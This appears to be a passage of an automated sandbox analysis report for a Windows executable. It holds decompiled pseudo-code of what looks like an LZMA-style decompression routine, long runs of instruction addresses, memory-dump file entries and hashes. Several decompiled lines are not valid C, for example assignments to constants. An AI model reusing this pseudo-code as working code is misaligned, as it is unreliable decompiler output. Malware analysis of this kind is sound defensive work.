							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                            0x00000000
                                                                                                            0x00406767
                                                                                                            0x00406767
                                                                                                            0x0040676b
                                                                                                            0x00406790
                                                                                                            0x0040679a
                                                                                                            0x00000000
                                                                                                            0x0040676d
                                                                                                            0x0040676d
                                                                                                            0x00406770
                                                                                                            0x00406774
                                                                                                            0x00406777
                                                                                                            0x0040677a
                                                                                                            0x0040677e
                                                                                                            0x0040677e
                                                                                                            0x00406781
                                                                                                            0x0040685b
                                                                                                            0x0040685b
                                                                                                            0x00406862
                                                                                                            0x00406862
                                                                                                            0x00406865
                                                                                                            0x0040686c
                                                                                                            0x00406899
                                                                                                            0x0040689d
                                                                                                            0x004068fd
                                                                                                            0x00406900
                                                                                                            0x00406905
                                                                                                            0x00406906
                                                                                                            0x00406908
                                                                                                            0x0040690a
                                                                                                            0x0040690d
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fbe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x00000000
                                                                                                            0x00405fcf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fd8
                                                                                                            0x00405fdb
                                                                                                            0x00405fde
                                                                                                            0x00405fe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fe8
                                                                                                            0x00405feb
                                                                                                            0x00405fed
                                                                                                            0x00405fee
                                                                                                            0x00405ff1
                                                                                                            0x00405ff3
                                                                                                            0x00405ff4
                                                                                                            0x00405ff6
                                                                                                            0x00405ff9
                                                                                                            0x00405ffe
                                                                                                            0x00406003
                                                                                                            0x0040600c
                                                                                                            0x0040601f
                                                                                                            0x00406022
                                                                                                            0x0040602e
                                                                                                            0x00406056
                                                                                                            0x00406058
                                                                                                            0x00406066
                                                                                                            0x00406066
                                                                                                            0x0040606a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x0040605a
                                                                                                            0x0040605d
                                                                                                            0x0040605e
                                                                                                            0x0040605e
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x00406034
                                                                                                            0x00406039
                                                                                                            0x00406039
                                                                                                            0x00406042
                                                                                                            0x0040604a
                                                                                                            0x0040604d
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406070
                                                                                                            0x00406070
                                                                                                            0x00406074
                                                                                                            0x00406920
                                                                                                            0x00000000
                                                                                                            0x00406920
                                                                                                            0x0040607d
                                                                                                            0x0040608d
                                                                                                            0x00406090
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406096
                                                                                                            0x0040609a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040609c
                                                                                                            0x004060a2
                                                                                                            0x004060cc
                                                                                                            0x004060d2
                                                                                                            0x004060d9
                                                                                                            0x00000000
                                                                                                            0x004060d9
                                                                                                            0x004060a8
                                                                                                            0x004060ab
                                                                                                            0x004060b0
                                                                                                            0x004060b0
                                                                                                            0x004060bb
                                                                                                            0x004060c3
                                                                                                            0x004060c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040610b
                                                                                                            0x00406111
                                                                                                            0x00406114
                                                                                                            0x00406121
                                                                                                            0x00406129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004060e0
                                                                                                            0x004060e0
                                                                                                            0x004060e4
                                                                                                            0x0040692f
                                                                                                            0x00000000
                                                                                                            0x0040692f
                                                                                                            0x004060f0
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fe
                                                                                                            0x00406101
                                                                                                            0x00406104
                                                                                                            0x00406109
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067ee
                                                                                                            0x004067f2
                                                                                                            0x004069a1
                                                                                                            0x00000000
                                                                                                            0x004069a1
                                                                                                            0x004067fe
                                                                                                            0x00406805
                                                                                                            0x0040680d
                                                                                                            0x00406810
                                                                                                            0x00406813
                                                                                                            0x00406813
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406131
                                                                                                            0x00406133
                                                                                                            0x00406136
                                                                                                            0x004061a7
                                                                                                            0x004061aa
                                                                                                            0x004061ad
                                                                                                            0x004061b4
                                                                                                            0x004061be
                                                                                                            0x00000000
                                                                                                            0x004061be
                                                                                                            0x00406138
                                                                                                            0x0040613c
                                                                                                            0x0040613f
                                                                                                            0x00406141
                                                                                                            0x00406144
                                                                                                            0x00406147
                                                                                                            0x00406149
                                                                                                            0x0040614c
                                                                                                            0x0040614e
                                                                                                            0x00406153
                                                                                                            0x00406156
                                                                                                            0x00406159
                                                                                                            0x0040615d
                                                                                                            0x00406164
                                                                                                            0x00406167
                                                                                                            0x0040616e
                                                                                                            0x00406172
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x0040617e
                                                                                                            0x00406181
                                                                                                            0x0040619f
                                                                                                            0x004061a1
                                                                                                            0x00000000
                                                                                                            0x00406183
                                                                                                            0x00406183
                                                                                                            0x00406186
                                                                                                            0x00406189
                                                                                                            0x0040618c
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x00406191
                                                                                                            0x00406194
                                                                                                            0x00406196
                                                                                                            0x00406197
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x004063d0
                                                                                                            0x004063d4
                                                                                                            0x004063f2
                                                                                                            0x004063f5
                                                                                                            0x004063fc
                                                                                                            0x004063ff
                                                                                                            0x00406402
                                                                                                            0x00406405
                                                                                                            0x00406408
                                                                                                            0x0040640b
                                                                                                            0x0040640d
                                                                                                            0x00406414
                                                                                                            0x00406415
                                                                                                            0x00406417
                                                                                                            0x0040641a
                                                                                                            0x0040641d
                                                                                                            0x00406420
                                                                                                            0x00406420
                                                                                                            0x00406425
                                                                                                            0x00000000
                                                                                                            0x00406425
                                                                                                            0x004063d6
                                                                                                            0x004063d9
                                                                                                            0x004063dc
                                                                                                            0x004063e6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040643a
                                                                                                            0x0040643e
                                                                                                            0x00406461
                                                                                                            0x00406464
                                                                                                            0x00406467
                                                                                                            0x00406471
                                                                                                            0x00406440
                                                                                                            0x00406440
                                                                                                            0x00406443
                                                                                                            0x00406446
                                                                                                            0x00406449
                                                                                                            0x00406456
                                                                                                            0x00406459
                                                                                                            0x00406459
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040647d
                                                                                                            0x00406481
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406487
                                                                                                            0x0040648b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406491
                                                                                                            0x00406493
                                                                                                            0x00406497
                                                                                                            0x00406497
                                                                                                            0x0040649a
                                                                                                            0x0040649e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064ee
                                                                                                            0x004064f2
                                                                                                            0x004064f9
                                                                                                            0x004064fc
                                                                                                            0x004064ff
                                                                                                            0x00406509
                                                                                                            0x00000000
                                                                                                            0x00406509
                                                                                                            0x004064f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406515
                                                                                                            0x00406519
                                                                                                            0x00406520
                                                                                                            0x00406523
                                                                                                            0x00406526
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x00406529
                                                                                                            0x0040652c
                                                                                                            0x0040652f
                                                                                                            0x0040652f
                                                                                                            0x00406532
                                                                                                            0x00406535
                                                                                                            0x00406538
                                                                                                            0x00406538
                                                                                                            0x0040653b
                                                                                                            0x00406542
                                                                                                            0x00406547
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004065d5
                                                                                                            0x004065d5
                                                                                                            0x004065d9
                                                                                                            0x00406977
                                                                                                            0x00000000
                                                                                                            0x00406977
                                                                                                            0x004065df
                                                                                                            0x004065e2
                                                                                                            0x004065e5
                                                                                                            0x004065e9
                                                                                                            0x004065ec
                                                                                                            0x004065f2
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f7
                                                                                                            0x004065fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061ca
                                                                                                            0x004061ca
                                                                                                            0x004061ce
                                                                                                            0x0040693b
                                                                                                            0x00000000
                                                                                                            0x0040693b
                                                                                                            0x004061d4
                                                                                                            0x004061d7
                                                                                                            0x004061da
                                                                                                            0x004061de
                                                                                                            0x004061e1
                                                                                                            0x004061e7
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061ec
                                                                                                            0x004061ef
                                                                                                            0x004061ef
                                                                                                            0x004061f2
                                                                                                            0x004061f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061fb
                                                                                                            0x00406201
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406207
                                                                                                            0x00406207
                                                                                                            0x0040620b
                                                                                                            0x0040620e
                                                                                                            0x00406211
                                                                                                            0x00406214
                                                                                                            0x00406217
                                                                                                            0x00406218
                                                                                                            0x0040621b
                                                                                                            0x0040621d
                                                                                                            0x00406223
                                                                                                            0x00406226
                                                                                                            0x00406229
                                                                                                            0x0040622c
                                                                                                            0x0040622f
                                                                                                            0x00406232
                                                                                                            0x00406235
                                                                                                            0x00406251
                                                                                                            0x00406254
                                                                                                            0x00406257
                                                                                                            0x0040625a
                                                                                                            0x00406261
                                                                                                            0x00406265
                                                                                                            0x00406267
                                                                                                            0x0040626b
                                                                                                            0x00406237
                                                                                                            0x00406237
                                                                                                            0x0040623b
                                                                                                            0x00406243
                                                                                                            0x00406248
                                                                                                            0x0040624a
                                                                                                            0x0040624c
                                                                                                            0x0040624c
                                                                                                            0x0040626e
                                                                                                            0x00406275
                                                                                                            0x00406278
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x00406283
                                                                                                            0x00406283
                                                                                                            0x00406287
                                                                                                            0x00406947
                                                                                                            0x00000000
                                                                                                            0x00406947
                                                                                                            0x0040628d
                                                                                                            0x00406290
                                                                                                            0x00406293
                                                                                                            0x00406297
                                                                                                            0x0040629a
                                                                                                            0x004062a0
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a5
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004062b0
                                                                                                            0x004062b3
                                                                                                            0x004062b6
                                                                                                            0x004062b9
                                                                                                            0x004062bc
                                                                                                            0x004062bf
                                                                                                            0x004062c2
                                                                                                            0x004062c5
                                                                                                            0x004062c8
                                                                                                            0x004062cb
                                                                                                            0x004062ce
                                                                                                            0x004062e6
                                                                                                            0x004062e9
                                                                                                            0x004062ec
                                                                                                            0x004062ef
                                                                                                            0x004062ef
                                                                                                            0x004062f2
                                                                                                            0x004062f6
                                                                                                            0x004062f8
                                                                                                            0x004062d0
                                                                                                            0x004062d0
                                                                                                            0x004062d8
                                                                                                            0x004062dd
                                                                                                            0x004062df
                                                                                                            0x004062e1
                                                                                                            0x004062e1
                                                                                                            0x004062fb
                                                                                                            0x00406302
                                                                                                            0x00406305
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00406305
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406347
                                                                                                            0x00406347
                                                                                                            0x0040634b
                                                                                                            0x00406953
                                                                                                            0x00000000
                                                                                                            0x00406953
                                                                                                            0x00406351
                                                                                                            0x00406354
                                                                                                            0x00406357
                                                                                                            0x0040635b
                                                                                                            0x0040635e
                                                                                                            0x00406364
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406369
                                                                                                            0x0040636c
                                                                                                            0x0040636c
                                                                                                            0x00406372
                                                                                                            0x00406310
                                                                                                            0x00406310
                                                                                                            0x00406313
                                                                                                            0x00000000
                                                                                                            0x00406313
                                                                                                            0x00406374
                                                                                                            0x00406374
                                                                                                            0x00406377
                                                                                                            0x0040637a
                                                                                                            0x0040637d
                                                                                                            0x00406380
                                                                                                            0x00406383
                                                                                                            0x00406386
                                                                                                            0x00406389
                                                                                                            0x0040638c
                                                                                                            0x0040638f
                                                                                                            0x00406392
                                                                                                            0x004063aa
                                                                                                            0x004063ad
                                                                                                            0x004063b0
                                                                                                            0x004063b3
                                                                                                            0x004063b3
                                                                                                            0x004063b6
                                                                                                            0x004063ba
                                                                                                            0x004063bc
                                                                                                            0x00406394
                                                                                                            0x00406394
                                                                                                            0x0040639c
                                                                                                            0x004063a1
                                                                                                            0x004063a3
                                                                                                            0x004063a5
                                                                                                            0x004063a5
                                                                                                            0x004063bf
                                                                                                            0x004063c6
                                                                                                            0x004063c9
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x00406658
                                                                                                            0x00406658
                                                                                                            0x0040665c
                                                                                                            0x00406983
                                                                                                            0x00000000
                                                                                                            0x00406983
                                                                                                            0x00406662
                                                                                                            0x00406665
                                                                                                            0x00406668
                                                                                                            0x0040666c
                                                                                                            0x0040666f
                                                                                                            0x00406675
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x0040667a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406428
                                                                                                            0x00406428
                                                                                                            0x0040642b
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406824
                                                                                                            0x00406828
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x0040684d
                                                                                                            0x00406854
                                                                                                            0x00000000
                                                                                                            0x00406854
                                                                                                            0x0040682a
                                                                                                            0x0040682d
                                                                                                            0x00406830
                                                                                                            0x00406833
                                                                                                            0x0040683a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406915
                                                                                                            0x00406918
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040654f
                                                                                                            0x00406551
                                                                                                            0x00406558
                                                                                                            0x00406559
                                                                                                            0x0040655b
                                                                                                            0x0040655e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406566
                                                                                                            0x00406569
                                                                                                            0x0040656c
                                                                                                            0x0040656e
                                                                                                            0x00406570
                                                                                                            0x00406570
                                                                                                            0x00406571
                                                                                                            0x00406574
                                                                                                            0x0040657b
                                                                                                            0x0040657e
                                                                                                            0x0040658c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406871
                                                                                                            0x00406871
                                                                                                            0x00406875
                                                                                                            0x004069ad
                                                                                                            0x00000000
                                                                                                            0x004069ad
                                                                                                            0x0040687b
                                                                                                            0x0040687e
                                                                                                            0x00406881
                                                                                                            0x00406885
                                                                                                            0x00406888
                                                                                                            0x0040688e
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406893
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406594
                                                                                                            0x00406597
                                                                                                            0x004065cd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x00406700
                                                                                                            0x00406700
                                                                                                            0x00406703
                                                                                                            0x00406705
                                                                                                            0x0040698f
                                                                                                            0x00000000
                                                                                                            0x0040698f
                                                                                                            0x0040670b
                                                                                                            0x0040670e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406714
                                                                                                            0x00406718
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x00000000
                                                                                                            0x0040671b
                                                                                                            0x00406599
                                                                                                            0x0040659b
                                                                                                            0x0040659d
                                                                                                            0x0040659f
                                                                                                            0x004065a2
                                                                                                            0x004065a3
                                                                                                            0x004065a5
                                                                                                            0x004065a7
                                                                                                            0x004065aa
                                                                                                            0x004065ad
                                                                                                            0x004065c3
                                                                                                            0x004065c8
                                                                                                            0x00406600
                                                                                                            0x00406600
                                                                                                            0x00406604
                                                                                                            0x00406630
                                                                                                            0x00406632
                                                                                                            0x00406639
                                                                                                            0x0040663c
                                                                                                            0x0040663f
                                                                                                            0x0040663f
                                                                                                            0x00406644
                                                                                                            0x00406644
                                                                                                            0x00406646
                                                                                                            0x00406649
                                                                                                            0x00406650
                                                                                                            0x00406653
                                                                                                            0x00406680
                                                                                                            0x00406680
                                                                                                            0x00406683
                                                                                                            0x00406686
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x00000000
                                                                                                            0x004066fa
                                                                                                            0x00406688
                                                                                                            0x0040668e
                                                                                                            0x00406691
                                                                                                            0x00406694
                                                                                                            0x00406697
                                                                                                            0x0040669a
                                                                                                            0x0040669d
                                                                                                            0x004066a0
                                                                                                            0x004066a3
                                                                                                            0x004066a6
                                                                                                            0x004066a9
                                                                                                            0x004066c2
                                                                                                            0x004066c4
                                                                                                            0x004066c7
                                                                                                            0x004066c8
                                                                                                            0x004066cb
                                                                                                            0x004066cd
                                                                                                            0x004066d0
                                                                                                            0x004066d2
                                                                                                            0x004066d4
                                                                                                            0x004066d7
                                                                                                            0x004066d9
                                                                                                            0x004066dc
                                                                                                            0x004066e0
                                                                                                            0x004066e2
                                                                                                            0x004066e2
                                                                                                            0x004066e3
                                                                                                            0x004066e6
                                                                                                            0x004066e9
                                                                                                            0x004066ab
                                                                                                            0x004066ab
                                                                                                            0x004066b3
                                                                                                            0x004066b8
                                                                                                            0x004066ba
                                                                                                            0x004066bd
                                                                                                            0x004066bd
                                                                                                            0x004066ec
                                                                                                            0x004066f3
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x004066f3
                                                                                                            0x00406606
                                                                                                            0x00406609
                                                                                                            0x0040660b
                                                                                                            0x0040660e
                                                                                                            0x00406611
                                                                                                            0x00406614
                                                                                                            0x00406616
                                                                                                            0x00406619
                                                                                                            0x0040661c
                                                                                                            0x0040661c
                                                                                                            0x0040661f
                                                                                                            0x0040661f
                                                                                                            0x00406622
                                                                                                            0x00406629
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00406629
                                                                                                            0x004065af
                                                                                                            0x004065b2
                                                                                                            0x004065b4
                                                                                                            0x004065b7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406316
                                                                                                            0x00406316
                                                                                                            0x0040631a
                                                                                                            0x0040695f
                                                                                                            0x00000000
                                                                                                            0x0040695f
                                                                                                            0x00406320
                                                                                                            0x00406323
                                                                                                            0x00406326
                                                                                                            0x00406329
                                                                                                            0x0040632c
                                                                                                            0x0040632f
                                                                                                            0x00406332
                                                                                                            0x00406334
                                                                                                            0x00406337
                                                                                                            0x0040633a
                                                                                                            0x0040633d
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064a1
                                                                                                            0x004064a1
                                                                                                            0x004064a5
                                                                                                            0x0040696b
                                                                                                            0x00000000
                                                                                                            0x0040696b
                                                                                                            0x004064ab
                                                                                                            0x004064ae
                                                                                                            0x004064b1
                                                                                                            0x004064b4
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b9
                                                                                                            0x004064bc
                                                                                                            0x004064bf
                                                                                                            0x004064c2
                                                                                                            0x004064c5
                                                                                                            0x004064c8
                                                                                                            0x004064c9
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064ce
                                                                                                            0x004064d1
                                                                                                            0x004064d4
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064da
                                                                                                            0x004064dc
                                                                                                            0x004064dc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x00406722
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406728
                                                                                                            0x0040672b
                                                                                                            0x0040672e
                                                                                                            0x00406731
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406736
                                                                                                            0x00406739
                                                                                                            0x0040673c
                                                                                                            0x0040673f
                                                                                                            0x00406742
                                                                                                            0x00406745
                                                                                                            0x00406746
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x0040674b
                                                                                                            0x0040674e
                                                                                                            0x00406751
                                                                                                            0x00406754
                                                                                                            0x00406757
                                                                                                            0x0040675b
                                                                                                            0x0040675d
                                                                                                            0x00406760
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x004064df
                                                                                                            0x004064df
                                                                                                            0x00000000
                                                                                                            0x004064df
                                                                                                            0x00406760
                                                                                                            0x00406995
                                                                                                            0x004069b7
                                                                                                            0x004069bd
                                                                                                            0x004069bf
                                                                                                            0x004069c6
                                                                                                            0x004069c8
                                                                                                            0x004069cf
                                                                                                            0x004069d3
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x004069cc
                                                                                                            0x004069cc
                                                                                                            0x00000000
                                                                                                            0x004069cc
                                                                                                            0x00406819
                                                                                                            0x0040689f
                                                                                                            0x004068a5
                                                                                                            0x004068a8
                                                                                                            0x004068ab
                                                                                                            0x004068ae
                                                                                                            0x004068b1
                                                                                                            0x004068b4
                                                                                                            0x004068b7
                                                                                                            0x004068ba
                                                                                                            0x004068c0
                                                                                                            0x004068d9
                                                                                                            0x004068dc
                                                                                                            0x004068df
                                                                                                            0x004068e2
                                                                                                            0x004068e6
                                                                                                            0x004068e8
                                                                                                            0x004068e9
                                                                                                            0x004068ec
                                                                                                            0x004068c2
                                                                                                            0x004068c2
                                                                                                            0x004068ca
                                                                                                            0x004068cf
                                                                                                            0x004068d1
                                                                                                            0x004068d4
                                                                                                            0x004068d4
                                                                                                            0x004068f6
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x004068f6
                                                                                                            0x00000000
                                                                                                            0x0040676b

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                            • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                                            • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                            • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
